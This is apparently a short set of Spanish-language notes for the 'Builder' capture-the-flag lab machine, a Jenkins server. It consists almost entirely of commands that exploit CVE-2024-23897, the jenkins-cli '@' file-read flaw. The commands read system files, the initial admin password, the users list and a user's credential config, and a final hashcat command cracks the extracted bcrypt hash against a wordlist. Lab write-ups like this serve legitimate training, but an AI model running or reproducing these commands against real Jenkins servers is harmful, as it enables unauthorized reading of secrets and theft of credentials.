Builder

Jenkins

El .jar para usar la cli de jenkins está en :

wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar

CVE-2024-23897

java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/etc/hostname' a

java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/var/jenkins_home/user.txt' a

Jenkins suele guardar la contraseña iniciar en:

/var/jenkins_home/secrets/initialAdminPassword
java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/var/jenkins_home/secrets/initialAdminPassword' a

Usuarios en:

/var/jenkins_home/users/users.xml
java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/users.xml'

Y credenciales en :

/var/jenkins_home/users/jennifer_12108429903186576833/config.xml
java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml'

hashcat -m 3200 jennifer_hash --user /usr/share/wordlist/rockyou.txt